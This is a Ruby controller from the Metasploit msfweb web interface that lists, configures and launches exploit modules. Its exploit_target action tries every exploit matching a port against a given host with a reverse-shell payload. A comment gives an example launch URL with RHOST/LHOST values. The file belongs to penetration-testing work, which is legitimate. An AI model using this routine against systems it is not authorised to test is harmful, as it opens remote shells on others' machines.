192 lines
4.4 KiB
Ruby
192 lines
4.4 KiB
Ruby
# Author: LMH <lmh@info-pull.com>
|
|
# Description: The exploit controller of msfweb v.3. Handles views, listing
|
|
# and other actions related to exploit modules. Code and processing goes here.
|
|
# Instance variables, final values, etc, go into views.
|
|
|
|
class ExploitsController < ApplicationController
|
|
layout 'windows'
|
|
|
|
def list
|
|
end
|
|
|
|
# exploits/exploit?host=<h>&port=<p>
|
|
def exploit_target
|
|
host = params[:host]
|
|
port = params[:port]
|
|
|
|
$msframework.exploits.each_module { |name, mod|
|
|
exploit = $msframework.exploits.create(name)
|
|
|
|
next if exploit.nil?
|
|
|
|
rport = exploit.datastore['RPORT']
|
|
|
|
next if rport.nil?
|
|
next if rport.to_i != port.to_i
|
|
|
|
$stdout.puts "trying exploit #{exploit.refname} against #{host}/#{port}"
|
|
|
|
begin
|
|
exploit.datastore['RHOST'] = host
|
|
|
|
# Run the exploit against the target
|
|
@new_session = exploit.exploit_simple(
|
|
'Payload' => 'generic/shell_reverse_tcp',
|
|
'LocalOutput' => Rex::Ui::Text::Output::Stdio.new)
|
|
rescue Exception => e
|
|
@emsg = e
|
|
end
|
|
|
|
break if @new_session
|
|
}
|
|
|
|
if @new_session
|
|
render_text "SUCCESS #{@new_session.sid}"
|
|
else
|
|
render_text "FAILURE #{@emsg}"
|
|
end
|
|
|
|
end
|
|
|
|
# exploits/exploit?refname=test:aggressive&payload=windows:shell:reverse_tcp&options=RHOST=10.87.43.103,LHOST=10.87.43.2
|
|
def exploit
|
|
@tmod = get_view_for_module("exploit", params[:refname])
|
|
|
|
render_text "FAILURE Invalid module #{params[:refname]}" if not @tmod
|
|
render_text "FAILURE Invalid payload #{params[:payload]}" if not params[:payload]
|
|
|
|
$stdout.puts "tmod is #{@tmod.name}, #{params[:options]}"
|
|
|
|
begin
|
|
# Run the exploit against the target
|
|
@new_session = @tmod.exploit_simple(
|
|
'Payload' => params[:payload].gsub(':', '/'),
|
|
'OptionStr' => (params[:options] || '').gsub(':', '/'),
|
|
'LocalOutput' => Rex::Ui::Text::Output::Stdio.new)
|
|
rescue Exception => e
|
|
@emsg = e
|
|
end
|
|
|
|
$stdout.puts "session is #{@new_session}"
|
|
|
|
if @new_session
|
|
render_text "SUCCESS #{@new_session.sid}"
|
|
else
|
|
render_text "FAILURE #{@emsg}"
|
|
end
|
|
end
|
|
|
|
def view
|
|
@tmod = get_view_for_module("exploit", params[:refname])
|
|
|
|
unless @tmod
|
|
render_text "Unknown module specified."
|
|
end
|
|
end
|
|
|
|
def config
|
|
# Retrieve object to module with the given refname
|
|
@tmod = get_view_for_module("exploit", params[:refname])
|
|
unless @tmod
|
|
render_text "Unknown module specified."
|
|
end
|
|
|
|
# Get target, using index given in 'target' parameter
|
|
@target = @tmod.targets[params[:target].to_i]
|
|
unless @target
|
|
render_text "Unknown target specified."
|
|
end
|
|
|
|
@tmod.datastore['TARGET'] = params[:target].to_i
|
|
|
|
@cur_step = nil
|
|
if params[:step]
|
|
@cur_step = params[:step]
|
|
end
|
|
|
|
|
|
if (params[:payload])
|
|
|
|
if (params[:payload] =~ /^\d+$/ )
|
|
@payload_ref = @tmod.compatible_payloads[params[:payload].to_i]
|
|
else
|
|
@tmod.compatible_payloads.each_with_index do |ref, i|
|
|
|
|
if(ref[0] == params[:payload])
|
|
@payload_ref = ref
|
|
end
|
|
end
|
|
end
|
|
end
|
|
|
|
|
|
if @cur_step == "exploit"
|
|
|
|
# Always show the option page after an exploit is launched
|
|
@cur_step = "config"
|
|
|
|
unless @payload_ref
|
|
render_text "Unknown payload specified or not supported."
|
|
end
|
|
|
|
@payload_name, @payload_class = @payload_ref
|
|
@payload_inst = @payload_class.new
|
|
|
|
# Create a new console driver instance
|
|
@cid = $msfweb.create_console()
|
|
@con = $msfweb.consoles[@cid]
|
|
|
|
# Use the selected module
|
|
@con.execute("use exploit/#{@tmod.refname}")
|
|
|
|
# Configure the target and payload
|
|
@exploit = @con.active_module
|
|
@exploit.datastore['PAYLOAD'] = @payload_name
|
|
@exploit.datastore['TARGET'] = params[:target].to_i
|
|
|
|
# Configure the selected options
|
|
params.each_key do |k|
|
|
eopt = k.to_s.match(/^eopt_/) ? true : false
|
|
popt = k.to_s.match(/^popt_/) ? true : false
|
|
name = k.to_s.gsub(/^.opt_/, '')
|
|
|
|
if (eopt or popt)
|
|
if (params[k] and params[k].to_s.length > 0)
|
|
@exploit.datastore[name] = params[k].to_s
|
|
end
|
|
end
|
|
end
|
|
|
|
# Validate the exploit and payload options
|
|
@payload_inst.share_datastore(@exploit.datastore)
|
|
|
|
begin
|
|
@exploit.options.validate(@exploit.datastore)
|
|
@payload_inst.options.validate(@payload_inst.datastore)
|
|
@con.write("exploit\n")
|
|
@exploit_console = @cid
|
|
rescue ::Exception => e
|
|
$msfweb.destroy_console(@cid)
|
|
@exploit_error = e.to_s
|
|
end
|
|
end
|
|
|
|
|
|
if @cur_step == "config"
|
|
|
|
unless @payload_ref
|
|
render_text "Unknown payload specified or not supported."
|
|
end
|
|
|
|
@payload_name, @payload_class = @payload_ref
|
|
@payload_inst = @payload_class.new
|
|
|
|
else
|
|
@payloads = @tmod.compatible_payloads
|
|
end
|
|
|
|
end
|
|
|
|
|
|
end
|